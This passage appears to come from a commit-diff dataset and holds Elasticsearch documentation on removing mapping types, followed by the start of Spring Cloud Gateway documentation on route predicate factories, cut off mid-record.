TESTRESPONSE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[float]\n==== Document APIs\n\nIn 7.0, index APIs must be called with the `{index}\/_doc` path for automatic\ngeneration of the `_id` and `{index}\/_doc\/{id}` with explicit ids.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_doc\/1\n{\n \"foo\": \"baz\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\": \"index\",\n \"_id\": \"1\",\n \"_type\": \"_doc\",\n \"_version\": 1,\n \"result\": \"created\",\n \"_shards\": {\n \"total\": 2,\n \"successful\": 1,\n \"failed\": 0\n },\n \"_seq_no\": 0,\n \"_primary_term\": 1\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nSimilarly, the `get` and `delete` APIs use the path `{index}\/_doc\/{id}`:\n\n[source,js]\n--------------------------------------------------\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nFor API paths that contain both a type and endpoint name like `_update`,\nin 7.0 the endpoint will immediately follow the index name:\n\n[source,js]\n--------------------------------------------------\nPOST index\/_update\/1\n{\n \"doc\" : {\n \"foo\" : \"qux\"\n }\n}\n\nGET \/index\/_source\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nTypes should also no longer appear in the body of requests. The following\nexample of bulk indexing omits the type both in the URL and in the individual\nbulk commands:\n\n[source,js]\n--------------------------------------------------\nPOST _bulk\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"3\" } }\n{ \"foo\" : \"baz\" }\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"4\" } }\n{ \"foo\" : \"qux\" }\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n==== Search APIs\n\nWhen calling a search API such as `_search`, `_msearch`, or `_explain`, types\nshould not be included in the URL. Additionally, the `_type` field should not\nbe used in queries, aggregations, or scripts.\n\n[float]\n==== Types in responses\n\nThe document and search APIs will continue to return a `_type` key in\nresponses, to avoid breaking response parsing. However, the key is\nconsidered deprecated and should no longer be referenced. Types will\nbe completely removed from responses in 8.0.\n\nNote that when a deprecated typed API is used, the index's mapping type will be\nreturned as normal, but typeless APIs will return the dummy type `_doc`\nin the response. For example, the following typeless `get` call will always\nreturn `_doc` as the type, even if the mapping has a custom type name like\n`my_type`:\n\n[source,js]\n--------------------------------------------------\nPUT index\/my_type\/1\n{\n \"foo\": \"baz\"\n}\n\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\" : \"index\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"found\": true,\n \"_source\" : {\n \"foo\" : \"baz\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\n[float]\n==== Index templates\n\nIt is recommended to make index templates typeless by re-adding them with\n`include_type_name` set to `false`. Under the hood, typeless templates will use\nthe dummy type `_doc` when creating indices.\n\nIf typeless templates are used with typed index creation calls, or typed\ntemplates with typeless index creation calls, the template will still be\napplied, but the index creation call decides whether there should be a type\nor not. 
For instance in the below example, `index-1-01` will have a type in\nspite of the fact that it matches a template that is typeless, and `index-2-01`\nwill be typeless in spite of the fact that it matches a template that defines\na type. Both `index-1-01` and `index-2-01` will inherit the `foo` field from\nthe template that they match.\n\n[source,js]\n--------------------------------------------------\nPUT _template\/template1\n{\n \"index_patterns\":[ \"index-1-*\" ],\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n\nPUT _template\/template2?include_type_name=true\n{\n \"index_patterns\":[ \"index-2-*\" ],\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT index-1-01?include_type_name=true\n{\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n }\n}\n\nPUT index-2-01\n{\n \"mappings\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn case of implicit index creation, because of documents that get indexed in\nan index that doesn't exist yet, the template is always honored. This is\nusually not a problem due to the fact that typeless index calls work on typed\nindices.\n\n[float]\n==== Mixed-version clusters\n\nIn a cluster composed of both 6.7 and 7.0 nodes, the parameter\n`include_type_name` should be specified in indices APIs like index\ncreation. This is because the parameter has a different default between\n6.7 and 7.0, so the same mapping definition will not be valid for both\nnode versions.\n\nTypeless document APIs such as `bulk` and `update` are only available as of\n7.0, and will not work with 6.7 nodes. This also holds true for the typeless\nversions of queries that perform document lookups, such as `terms`.\n","old_contents":"[[removal-of-types]]\n== Removal of mapping types\n\nIMPORTANT: Indices created in Elasticsearch 6.0.0 or later may only contain a\nsingle <<mapping-type,mapping type>>. Indices created in 5.x with multiple\nmapping types will continue to function as before in Elasticsearch 6.x.\nTypes will be deprecated in APIs in Elasticsearch 7.0.0, and completely\nremoved in 8.0.0.\n\n[float]\n=== What are mapping types?\n\nSince the first release of Elasticsearch, each document has been stored in a\nsingle index and assigned a single mapping type. 
A mapping type was used to\nrepresent the type of document or entity being indexed, for instance a\n`twitter` index might have a `user` type and a `tweet` type.\n\nEach mapping type could have its own fields, so the `user` type might have a\n`full_name` field, a `user_name` field, and an `email` field, while the\n`tweet` type could have a `content` field, a `tweeted_at` field and, like the\n`user` type, a `user_name` field.\n\nEach document had a `_type` meta-field containing the type name, and searches\ncould be limited to one or more types by specifying the type name(s) in the\nURL:\n\n[source,js]\n----\nGET twitter\/user,tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nThe `_type` field was combined with the document's `_id` to generate a `_uid`\nfield, so documents of different types with the same `_id` could exist in a\nsingle index.\n\nMapping types were also used to establish a\n<<mapping-parent-field,parent-child relationship>>\nbetween documents, so documents of type `question` could be parents to\ndocuments of type `answer`.\n\n[float]\n=== Why are mapping types being removed?\n\nInitially, we spoke about an ``index'' being similar to a ``database'' in an\nSQL database, and a ``type'' being equivalent to a\n``table''.\n\nThis was a bad analogy that led to incorrect assumptions. In an SQL database,\ntables are independent of each other. The columns in one table have no\nbearing on columns with the same name in another table. This is not the case\nfor fields in a mapping type.\n\nIn an Elasticsearch index, fields that have the same name in different mapping\ntypes are backed by the same Lucene field internally. In other words, using\nthe example above, the `user_name` field in the `user` type is stored in\nexactly the same field as the `user_name` field in the `tweet` type, and both\n`user_name` fields must have the same mapping (definition) in both types.\n\nThis can lead to frustration when, for example, you want `deleted` to be a\n`date` field in one type and a `boolean` field in another type in the same\nindex.\n\nOn top of that, storing different entities that have few or no fields in\ncommon in the same index leads to sparse data and interferes with Lucene's\nability to compress documents efficiently.\n\nFor these reasons, we have decided to remove the concept of mapping types from\nElasticsearch.\n\n[float]\n=== Alternatives to mapping types\n\n[float]\n==== Index per document type\n\nThe first alternative is to have an index per document type. Instead of\nstoring tweets and users in a single `twitter` index, you could store tweets\nin the `tweets` index and users in the `user` index. Indices are completely\nindependent of each other and so there will be no conflict of field types\nbetween indices.\n\nThis approach has two benefits:\n\n* Data is more likely to be dense and so benefit from compression techniques\n used in Lucene.\n\n* The term statistics used for scoring in full text search are more likely to\n be accurate because all documents in the same index represent a single\n entity.\n\nEach index can be sized appropriately for the number of documents it will\ncontain: you can use a smaller number of primary shards for `users` and a\nlarger number of primary shards for `tweets`.\n\n[float]\n==== Custom type field\n\nOf course, there is a limit to how many primary shards can exist in a cluster\nso you may not want to waste an entire shard for a collection of only a few\nthousand documents. 
In this case, you can implement your own custom `type`\nfield which will work in a similar way to the old `_type`.\n\nLet's take the `user`\/`tweet` example above. Originally, the workflow would\nhave looked something like this:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"user\": {\n \"properties\": {\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" }\n }\n },\n \"tweet\": {\n \"properties\": {\n \"content\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/user\/kimchy\n{\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/tweet\/1\n{\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nYou can achieve the same thing by adding a custom `type` field as follows:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": { \"type\": \"keyword\" }, <1>\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" },\n \"content\": { \"type\": \"text\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/_doc\/user-kimchy\n{\n \"type\": \"user\", <1>\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/_doc\/tweet-1\n{\n \"type\": \"tweet\", <1>\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/_search\n{\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n },\n \"filter\": {\n \"match\": {\n \"type\": \"tweet\" <1>\n }\n }\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n<1> The explicit `type` field takes the place of the implicit `_type` field.\n\n[float]\n==== Parent\/Child without mapping types\n\nPreviously, a parent-child relationship was represented by making one mapping\ntype the parent, and one or more other mapping types the children. Without\ntypes, we can no longer use this syntax. The parent-child feature will\ncontinue to function as before, except that the way of expressing the\nrelationship between documents has been changed to use the new\n<<parent-join,`join` field>>.\n\n\n[float]\n=== Schedule for removal of mapping types\n\nThis is a big change for our users, so we have tried to make it as painless as\npossible. The change will roll out as follows:\n\nElasticsearch 5.6.0::\n\n* Setting `index.mapping.single_type: true` on an index will enable the\n single-type-per-index behaviour which will be enforced in 6.0.\n\n* The <<parent-join,`join` field>> replacement for parent-child is available\n on indices created in 5.6.\n\nElasticsearch 6.x::\n\n* Indices created in 5.x will continue to function in 6.x as they did in 5.x.\n\n* Indices created in 6.x only allow a single-type per index. Any name\n can be used for the type, but there can be only one. The preferred type name\n is `_doc`, so that index APIs have the same path as they will have in 7.0:\n `PUT {index}\/_doc\/{id}` and `POST {index}\/_doc`\n\n* The `_type` name can no longer be combined with the `_id` to form the `_uid`\n field. 
The `_uid` field has become an alias for the `_id` field.\n\n* New indices no longer support the old-style of parent\/child and should\n use the <<parent-join,`join` field>> instead.\n\n* The `_default_` mapping type is deprecated.\n\n* In 6.7, the index creation, index template, and mapping APIs support a query\n string parameter (`include_type_name`) which indicates whether requests and\n responses should include a type name. It defaults to `true`, and should be set\n to an explicit value to prepare to upgrade to 7.0. Not setting `include_type_name`\n will result in a deprecation warning. Indices which don't have an explicit type will\n use the dummy type name `_doc`.\n\nElasticsearch 7.x::\n\n* Specifying types in requests is deprecated. For instance, indexing a\n document no longer requires a document `type`. The new index APIs\n are `PUT {index}\/_doc\/{id}` in case of explicit ids and `POST {index}\/_doc`\n for auto-generated ids.\n\n* The `include_type_name` parameter in the index creation, index template,\n and mapping APIs will default to `false`. Setting the parameter at all will\n result in a deprecation warning.\n\n* The `_default_` mapping type is removed.\n\nElasticsearch 8.x::\n\n* Specifying types in requests is no longer supported.\n\n* The `include_type_name` parameter is removed.\n\n[float]\n=== Migrating multi-type indices to single-type\n\nThe <<docs-reindex,Reindex API>> can be used to convert multi-type indices to\nsingle-type indices. The following examples can be used in Elasticsearch 5.6\nor Elasticsearch 6.x. In 6.x, there is no need to specify\n`index.mapping.single_type` as that is the default.\n\n[float]\n==== Index per document type\n\nThis first example splits our `twitter` index into a `tweets` index and a\n`users` index:\n\n[source,js]\n----\nPUT users\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT tweets\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"content\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"user\"\n },\n \"dest\": {\n \"index\": \"users\"\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\"\n },\n \"dest\": {\n \"index\": \"tweets\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n==== Custom type field\n\nThis next example adds a custom `type` field and sets it to the value of the\noriginal `_type`. 
It also adds the type to the `_id` in case there are any\ndocuments of different types which have conflicting IDs:\n\n[source,js]\n----\nPUT new_twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": {\n \"type\": \"keyword\"\n },\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n },\n \"content\": {\n \"type\": \"text\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n },\n \"script\": {\n \"source\": \"\"\"\n ctx._source.type = ctx._type;\n ctx._id = ctx._type + '-' + ctx._id;\n ctx._type = '_doc';\n \"\"\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n=== Typeless APIs in 7.0\n\nIn Elasticsearch 7.0, each API will support typeless requests,\nand specifying a type will produce a deprecation warning.\n\nNOTE: Typeless APIs work even if the target index contains a custom type.\nFor example, if an index has the the custom type name `my_type`, we can add\ndocuments to it using typeless `index` calls, and load documents with typeless\n`get` calls.\n\n[float]\n==== Indices APIs\n\nIndex creation, index template, and mapping APIs support a new `include_type_name`\nURL parameter that specifies whether mapping definitions in requests and responses\nshould contain the type name. The parameter defaults to `true` in version 6.7 to\nmatch the pre-7.0 behavior of using type names in mappings. It defaults to `false`\nin version 7.0 and will be removed in version 8.0.\n\nIt should be set explicitly in 6.7 to prepare to upgrade to 7.0. To avoid deprecation\nwarnings in 6.7, the parameter can be set to either `true` or `false`. In 7.0, setting\n`include_type_name` at all will result in a deprecation warning.\n\nSee some examples of interactions with Elasticsearch with this option set to `false`:\n\n[source,js]\n--------------------------------------------------\nPUT index?include_type_name=false\n{\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_mappings?include_type_name=false\n{\n \"properties\": { <1>\n \"bar\": {\n \"type\": \"text\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nGET index\/_mappings?include_type_name=false\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe above call returns\n\n[source,js]\n--------------------------------------------------\n{\n \"index\": {\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n },\n \"bar\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[float]\n==== Document APIs\n\nIn 7.0, index APIs must be called with the `{index}\/_doc` path for automatic\ngeneration of the `_id` and `{index}\/_doc\/{id}` with explicit ids.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_doc\/1\n{\n \"foo\": 
\"baz\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\": \"index\",\n \"_id\": \"1\",\n \"_type\": \"_doc\",\n \"_version\": 1,\n \"result\": \"created\",\n \"_shards\": {\n \"total\": 2,\n \"successful\": 1,\n \"failed\": 0\n },\n \"_seq_no\": 0,\n \"_primary_term\": 1\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nSimilarly, the `get` and `delete` APIs use the path `{index}\/_doc\/{id}`:\n\n[source,js]\n--------------------------------------------------\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nFor API paths that contain both a type and endpoint name like `_update`,\nin 7.0 the endpoint will immediately follow the index name:\n\n[source,js]\n--------------------------------------------------\nPOST index\/_update\/1\n{\n \"doc\" : {\n \"foo\" : \"qux\"\n }\n}\n\nGET \/index\/_source\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nTypes should also no longer appear in the body of requests. The following\nexample of bulk indexing omits the type both in the URL, and in the individual\nbulk commands:\n\n[source,js]\n--------------------------------------------------\nPOST _bulk\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"3\" } }\n{ \"foo\" : \"baz\" }\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"4\" } }\n{ \"foo\" : \"qux\" }\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n==== Search APIs\n\nWhen calling a search API such `_search`, `_msearch`, or `_explain`, types\nshould not be included in the URL. Additionally, the `_type` field should not\nbe used in queries, aggregations, or scripts.\n\n[float]\n==== Types in responses\n\nThe document and search APIs will continue to return a `_type` key in\nresponses, to avoid breaks to response parsing. However, the key is\nconsidered deprecated and should no longer be referenced. Types will\nbe completely removed from responses in 8.0.\n\nNote that when a deprecated typed API is used, the index's mapping type will be\nreturned as normal, but that typeless APIs will return the dummy type `_doc`\nin the response. For example, the following typeless `get` call will always\nreturn `_doc` as the type, even if the mapping has a custom type name like\n`my_type`:\n\n[source,js]\n--------------------------------------------------\nPUT index\/my_type\/1\n{\n \"foo\": \"baz\"\n}\n\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\" : \"index\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"found\": true,\n \"_source\" : {\n \"foo\" : \"baz\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\n[float]\n==== Index templates\n\nIt is recommended to make index templates typeless by re-adding them with\n`include_type_name` set to `false`. Under the hood, typeless templates will use\nthe dummy type `_doc` when creating indices.\n\nIn case typeless templates are used with typed index creation calls or typed\ntemplates are used with typeless index creation calls, the template will still\nbe applied but the index creation call decides whether there should be a type\nor not. 
For instance in the below example, `index-1-01` will have a type in\nspite of the fact that it matches a template that is typeless, and `index-2-01`\nwill be typeless in spite of the fact that it matches a template that defines\na type. Both `index-1-01` and `index-2-01` will inherit the `foo` field from\nthe template that they match.\n\n[source,js]\n--------------------------------------------------\nPUT _template\/template1\n{\n \"index_patterns\":[ \"index-1-*\" ],\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n\nPUT _template\/template2?include_type_name=true\n{\n \"index_patterns\":[ \"index-2-*\" ],\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT index-1-01?include_type_name=true\n{\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n }\n}\n\nPUT index-2-01\n{\n \"mappings\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn case of implicit index creation, because of documents that get indexed in\nan index that doesn't exist yet, the template is always honored. This is\nusually not a problem due to the fact that typeless index calls work on typed\nindices.\n\n[float]\n==== Mixed-version clusters\n\nIn a cluster composed of both 6.7 and 7.0 nodes, the parameter\n`include_type_name` should be specified in indices APIs like index\ncreation. This is because the parameter has a different default between\n6.7 and 7.0, so the same mapping definition will not be valid for both\nnode versions.\n\nTypeless document APIs such as `bulk` and `update` are only available as of\n7.0, and will not work with 6.7 nodes. This also holds true for the typeless\nversions of queries that perform document lookups, such as `terms`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40b8df69c708b1dfc5a864a15b7045c22f7b8a9e","subject":"fix tag","message":"fix tag\n","repos":"spring-cloud-incubator\/spring-cloud-gateway,spring-cloud-incubator\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-gateway.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-gateway.adoc","new_contents":":github-tag: 2.0.x\n:github-repo: spring-cloud\/spring-cloud-gateway\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n:nofooter:\n:imagesdir: .\/images\n:imagesurl: {github-raw}\/docs\/src\/main\/asciidoc\/images\n= Spring Cloud Gateway\n\n*{spring-cloud-version}*\n\ninclude::intro.adoc[]\n\n[[gateway-starter]]\n== How to Include Spring Cloud Gateway\n\nTo include Spring Cloud Gateway in your project use the starter with group `org.springframework.cloud`\nand artifact id `spring-cloud-starter-gateway`. See the http:\/\/projects.spring.io\/spring-cloud\/[Spring Cloud Project page]\nfor details on setting up your build system with the current Spring Cloud Release Train.\n\nIf you include the starter, but, for some reason, you do not want the gateway to be enabled, set `spring.cloud.gateway.enabled=false`.\n\n== Glossary\n\n* *Route*: Route the basic building block of the gateway. It is defined by an ID, a destination URI, a collection of predicates and a collection of filters. 
The route is matched if the aggregate predicate is true.\n* *Predicate*: This is a http:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/function\/Predicate.html[Java 8 Function Predicate]. The input type is a http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/ServerWebExchange.html[Spring Framework `ServerWebExchange`]. This allows developers to match on anything from the HTTP request, such as headers or parameters.\n* *Filter*: These are instances of http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/WebFilter.html[Spring Framework `WebFilter`] constructed with a specific factory. Here, requests and responses can be modified before or after sending the downstream request.\n\n[[gateway-how-it-works]]\n== How It Works\n\nimage::{imagesurl}\/spring_cloud_gateway_diagram.png[Spring Cloud Gateway Diagram]\n\nClients make requests to Spring Cloud Gateway. If the Gateway Handler Mapping determines that a request matches a Route, it is sent to the Gateway Web Handler. This handler sends the request through a filter chain that is specific to the request. The reason the filters are divided by the dotted line is that filters may execute logic before or after the proxy request is sent. All \"pre\" filter logic is executed, then the proxy request is made. After the proxy request is made, the \"post\" filter logic is executed.\n\n[[gateway-request-predicates-factories]]\n== Route Predicate Factories\n\nSpring Cloud Gateway matches routes as part of the Spring WebFlux `HandlerMapping` infrastructure. Spring Cloud Gateway includes many built-in Route Predicate Factories. All of these predicates match on different attributes of the HTTP request. Multiple Route Predicate Factories can be combined and are combined via logical `and`.\n\n=== After Route Predicate Factory\nThe After Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen after the specified datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: after_route\n uri: http:\/\/example.org\n predicates:\n - After=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request made after Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Before Route Predicate Factory\nThe Before Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen before the specified datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: before_route\n uri: http:\/\/example.org\n predicates:\n - Before=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request made before Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Between Route Predicate Factory\nThe Between Route Predicate Factory takes two parameters, datetime1 and datetime2. This predicate matches requests that happen after datetime1 and before datetime2. The datetime2 parameter must be after datetime1.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: between_route\n uri: http:\/\/example.org\n predicates:\n - Between=2017-01-20T17:42:47.789-07:00[America\/Denver], 2017-01-21T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request made after Jan 20, 2017 17:42 Mountain Time (Denver) and before Jan 21, 2017 17:42 Mountain Time (Denver). 
This could be useful for maintenance windows.\n\n=== Cookie Route Predicate Factory\nThe Cookie Route Predicate Factory takes two parameters, the cookie name and a regular expression. This predicate matches cookies that have the given name and whose value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: cookie_route\n uri: http:\/\/example.org\n predicates:\n - Cookie=chocolate, ch.p\n----\n\nThis route matches if the request has a cookie named `chocolate` whose value matches the `ch.p` regular expression.\n\n=== Header Route Predicate Factory\nThe Header Route Predicate Factory takes two parameters, the header name and a regular expression. This predicate matches if the request has a header with the given name whose value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: header_route\n uri: http:\/\/example.org\n predicates:\n - Header=X-Request-Id, \\d+\n----\n\nThis route matches if the request has a header named `X-Request-Id` whose value matches the `\\d+` regular expression (that is, a value of one or more digits).\n\n=== Host Route Predicate Factory\nThe Host Route Predicate Factory takes one parameter: the host name pattern. The pattern is an Ant style pattern with `.` as the separator. This predicate matches if the `Host` header matches the pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: host_route\n uri: http:\/\/example.org\n predicates:\n - Host=**.somehost.org\n----\n\nThis route would match if the request has a `Host` header with the value `www.somehost.org` or `beta.somehost.org`.\n\n\n=== Method Route Predicate Factory\nThe Method Route Predicate Factory takes one parameter: the HTTP method to match.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: method_route\n uri: http:\/\/example.org\n predicates:\n - Method=GET\n----\n\nThis route would match if the request method was a `GET`.\n\n=== Path Route Predicate Factory\nThe Path Route Predicate Factory takes one parameter: a Spring `PathMatcher` pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: path_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n----\n\nThis route would match if the request path was, for example, `\/foo\/1` or `\/foo\/bar`.\n\nThis predicate extracts the URI template variables (like `segment`, defined in the example above) as a map of names and values and places that map in the `ServerWebExchange.getAttributes()` with a key defined in `PathRoutePredicate.URL_PREDICATE_VARS_ATTR`. 
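For example, downstream code with access to the `ServerWebExchange` could read the extracted variables back; this is a minimal, illustrative sketch (null handling is elided, and the unchecked cast assumes the attribute holds the map of names to values described above):\n\n[source,java]\n----\n\/\/ Illustrative only: reading the variables captured by the Path predicate\nMap<String, String> uriVariables = (Map<String, String>)\n exchange.getAttributes().get(PathRoutePredicate.URL_PREDICATE_VARS_ATTR);\nString segment = uriVariables.get(\"segment\");\n----\n\n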
Those values are then available for use by <<gateway-route-filters,WebFilter Factories>>.\n\n=== Query Route Predicate Factory\nThe Query Route Predicate Factory takes two parameters: a required `param` and an optional `regexp`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=baz\n----\n\nThis route would match if the request contained a `baz` query parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=foo, ba.\n----\n\nThis route would match if the request contained a `foo` query parameter whose value matched the `ba.` regexp, so `bar` and `baz` would match.\n\n\n=== RemoteAddr Route Predicate Factory\nThe RemoteAddr Route Predicate Factory takes a list (min size 1) of CIDR-notation strings, e.g. `192.168.0.1\/16` (where `192.168.0.1` is an IP address and `16` is a subnet mask).\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: remoteaddr_route\n uri: http:\/\/example.org\n predicates:\n - RemoteAddr=192.168.1.1\/24\n----\n\nThis route would match if the remote address of the request was, for example, `192.168.1.10`.\n\n[[gateway-route-filters]]\n== WebFilter Factories\n\nRoute filters allow the modification of the incoming HTTP request or outgoing HTTP response in some manner. Route filters are scoped to a particular route. Spring Cloud Gateway includes many built-in WebFilter Factories.\n\n=== AddRequestHeader WebFilter Factory\nThe AddRequestHeader WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: 